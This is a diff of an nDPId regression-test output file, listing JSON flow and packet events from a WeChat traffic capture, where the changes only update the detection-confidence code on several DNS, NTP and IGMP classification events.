00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -508,7 +506,7 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171169377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1492171169377,"pkt":"8IQvSpdgeJKcD6iOCABFEABMYzZAAEAR4JXAqAFnwcxy6ZLKAHsAOA7KIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANybOCEWgBhs"} -00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} @@ -526,7 +524,7 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+U9AAEARvKPAqAFnwKgB\/uM1ADUAMHLoUUIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"} @@ -540,98 +538,98 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1492171177429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171177429,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+fFAAEARvAHAqAFnwKgB\/qk1ADUAMHHYjFIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1492171178741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171178741,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+rRAAEARuz7AqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1492171183746,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171183746,"pkt":"8IQvSpdgeJKcD6iOCABFAABE\/1xAAEARtpbAqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1492171184747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171184747,"pkt":"8IQvSpdgeJKcD6iOCABFAABEAC1AAEARtcbAqAFnwKgB\/oR7ADUAMLAAcuQBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1492171203806,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492171203806,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj\/YAAAEC8ZXAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1492171205448,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171205448,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 